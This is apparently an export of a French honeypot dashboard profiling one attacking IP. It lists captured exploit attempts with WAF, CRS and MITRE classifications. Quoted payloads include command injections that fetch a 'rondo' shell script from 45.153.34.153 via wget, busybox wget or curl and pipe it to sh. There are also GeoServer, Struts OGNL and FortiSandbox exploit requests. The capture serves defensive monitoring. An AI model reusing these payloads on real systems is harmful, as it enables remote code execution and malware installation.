Profil de menace
Activité suspecte — risque 69/100 (Élevé) — MITRE TA0001 — confiance 50 % — via HTTP
Activité suspecte — risque 69/100 (Élevé) — MITRE TA0001 — confiance 50 % — via HTTP
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Règle WAF « proto-0 » · confiance 50%
Confiance 50 % — Score WAF 100 · 8 tag(s) WAF
ASN 219502 · 94.154.43.0/24 · RIPENCC — 8 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 64 événements sur la période pour cette IP.
Même FAI Storm Industries LLC — corrélation indicative.
Cette IP touche plusieurs services simulés (pas seulement le web).
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
64 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
64 événement(s) — page 1/2
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST / UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/1
Requête brute (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857376 |
|||||||
| TCP | 8022 | — | Injection de commande cmd injection · port 8022 · (tentative d'exploit) | Élevée | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
WAF
—
Recommandation
Investiguer
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
8022
Chemin / cible
—
Payload
auth ClueCon api system (wget -qO- http://45.153.34.153/rondo.\wns.sh||busybox wget -qO- http://45.153.34.153/rondo.\wns.sh||cu
Pourquoi cette classification : Type « cmd_injection » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
MITRE-T1059
pat-0773
pat-0775
pat-0782
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932190 php system
CRS 932200
CRS 932205
LFI Double-dot bypass
User-Agent
—
Règles WAF
—
Payload (extrait)
auth ClueCon api system (wget -qO- http://45.153.34.153/rondo.\wns.sh||busybox wget -qO- http://45.153.34.153/rondo.\wns.sh||cu
Requête brute (extrait)
auth ClueCon api system (wget -qO- http://45.153.34.153/rondo.\wns.sh||busybox wget -qO- http://45.153.34.153/rondo.\wns.sh||curl -s http://45.153.34.153/rondo.\wns.sh)|sh& |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /app | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /app UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/app
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/app
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /_next | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /_next UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/_next
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/_next
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /_next HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Fire
Requête brute (extrait)
POST /_next HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e08 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /app | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /app UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/app
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/app
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /app | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /app UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/app
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/app
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST / UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/1
Requête brute (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857376 |
|||||||
| TCP | 8080 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8080 · (tentative d'exploit) · → /fortisandbox/job-detail/tracer-behavior | Élevée | Moyen · 59 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /fortisandbox/job-detail/tracer-behavior UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
66
Recommandation
Investiguer
Tags
Cible HTTP
GET
/fortisandbox/job-detail/tracer-behavior
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/fortisandbox/job-detail/tracer-behavior
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 59
Confiance : Confiance 59 % — 10 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(wget%20-qO-%20http%3A%2F%2F45.153.34.153%2Frondo.qqk.sh%7Csh)%7C HTTP/1.1
Requête brute (extrait)
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(wget%20-qO-%20http%3A%2F%2F45.153.34.153%2Frondo.qqk.sh%7Csh)%7C HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: |
|||||||
| TCP | 8080 · HTTP | http | Injection de commande cmd injection · via HTTP:8080 · (tentative d'exploit) · → /geoserver/wfs | Élevée | Élevé · 66 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /geoserver/wfs UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
42
Recommandation
Investiguer
Tags
Cible HTTP
GET
/geoserver/wfs
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/geoserver/wfs
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 66
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0782
pat-0144
pat-0145
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932190 php system
CRS 932190
CRS 932200
CRS 932205
CRS 932206
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
rce-0
rce-3
nosqli-3
php-rce-passthru
Payload (extrait)
GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runti
Requête brute (extrait)
GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),%27bash%20-c%20%7Becho%2CKHdnZXQgLXFPLSBodHRwOi8vNDUuMTUzLjM0LjE1My9yb25kby5gYHp5dC5zaHx8YnVzeWJveCB3Z2V0IC1xTy0 |
|||||||
| TCP | 8080 · HTTP | http | Confluence OGNL confluence ognl · via HTTP:8080 · (tentative d'exploit) · → /struts2-showcase/index.action | Élevée | Élevé · 65 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1190
TA0001
TA0002
Protocole
POST /struts2-showcase/index.action UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
67
Recommandation
Investiguer
Tags
Cible HTTP
POST
/struts2-showcase/index.action
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8080
Chemin / cible
/struts2-showcase/index.action
Service
HTTP
Pourquoi cette classification : Type « confluence_ognl » (signaux protocolaires) · confiance 95%
Confiance classification
95%
Risque capteur
Élevé
· 65
Confiance : Confiance 95 % — Motif catalogue confirmé · 10 tag(s) WAF
Protocole émulé
1
Signaux
ET-EXPLOIT-Confluence
pat-0580
Technique MITRE
T1190
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CVE-2022-26134 Confluence OGNL
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
framework-4
upload-0
rce-curl-dns
Payload (extrait)
POST /struts2-showcase/index.action HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:15
Requête brute (extrait)
POST /struts2-showcase/index.action HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Content-Type: %{(#xxxx='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAU
|
|||||||
| TCP | 8080 · HTTP | http | Injection de commande cmd injection · via HTTP:8080 · (tentative d'exploit) · → /index.action | Élevée | Élevé · 66 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /index.action UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
36
Recommandation
Investiguer
Tags
Cible HTTP
GET
/index.action
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/index.action
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 66
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0782
pat-0145
pat-0146
pat-0147
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932190 php system
CRS 932200
CRS 932205
CRS 932206
CRS 934101
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
rce-0
rce-3
nosqli-3
php-rce-passthru
Payload (extrait)
GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberA
Requête brute (extrait)
GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue |
|||||||
| TCP | 8080 · HTTP | http | Sonde HTTP smuggling http smuggling probe · via HTTP:8080 · (tentative d'exploit) · → /scriptText | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /scriptText UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
54
Recommandation
Investiguer
Tags
Cible HTTP
POST
/scriptText
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8080
Chemin / cible
/scriptText
Service
HTTP
Pourquoi cette classification : Type « http_smuggling_probe » (signaux protocolaires) · confiance 95%
Confiance classification
95%
Risque capteur
Moyen
· 64
Confiance : Confiance 95 % — Motif catalogue confirmé · 8 tag(s) WAF
Protocole émulé
1
Signaux
pat-0842
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
ET jenkins script
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
jenkins-script
Payload (extrait)
POST /scriptText HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101
Requête brute (extrait)
POST /scriptText HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: */* Content-Type: application/x-www-form-urlencoded Content-Length: 95 script=pr |
|||||||
| TCP | 8080 · HTTP | http | Sonde HTTP smuggling http smuggling probe · via HTTP:8080 · (tentative d'exploit) · → /scriptText | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /scriptText UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
54
Recommandation
Investiguer
Tags
Cible HTTP
POST
/scriptText
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8080
Chemin / cible
/scriptText
Service
HTTP
Pourquoi cette classification : Type « http_smuggling_probe » (signaux protocolaires) · confiance 95%
Confiance classification
95%
Risque capteur
Moyen
· 64
Confiance : Confiance 95 % — Motif catalogue confirmé · 8 tag(s) WAF
Protocole émulé
1
Signaux
pat-0842
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
ET jenkins script
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
jenkins-script
Payload (extrait)
POST /scriptText HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101
Requête brute (extrait)
POST /scriptText HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: */* Content-Type: application/x-www-form-urlencoded Content-Length: 97 script=pr |
|||||||
| TCP | 5555 · PERSONAL AGENT | personal-agent | Agent personnel personal-agent · via PERSONAL AGENT:5555 · (sonde / probe) | Faible | Faible · 4 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
PERSONAL-AGENT
WAF
—
Recommandation
Surveiller
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
5555
Chemin / cible
—
Service
PERSONAL AGENT
Payload
CNXN ����
Pourquoi cette classification : Type « personal-agent » (signaux protocolaires) · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Faible
· 4
Confiance : Confiance 50 % — Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0554
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
CNXN ���� |
|||||||
| TCP | 5555 · PERSONAL AGENT | personal-agent | Agent personnel personal-agent · via PERSONAL AGENT:5555 · (sonde / probe) | Faible | Faible · 4 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
PERSONAL-AGENT
WAF
—
Recommandation
Surveiller
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
5555
Chemin / cible
—
Service
PERSONAL AGENT
Payload
CNXN ����
Pourquoi cette classification : Type « personal-agent » (signaux protocolaires) · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Faible
· 4
Confiance : Confiance 50 % — Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0554
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
CNXN ���� |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /_next/server | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /_next/server UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
50
Recommandation
Investiguer
Tags
Cible HTTP
POST
/_next/server
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/_next/server
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /_next/server HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/201001
Requête brute (extrait)
POST /_next/server HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf5 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /api | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /api UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/api
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
k8s-api
Payload (extrait)
POST /api HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /api HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 3001 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3001 · (tentative d'exploit) · → /_next | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /_next UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/_next
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3001
Chemin / cible
/_next
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 70
Confiance : Confiance 50 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
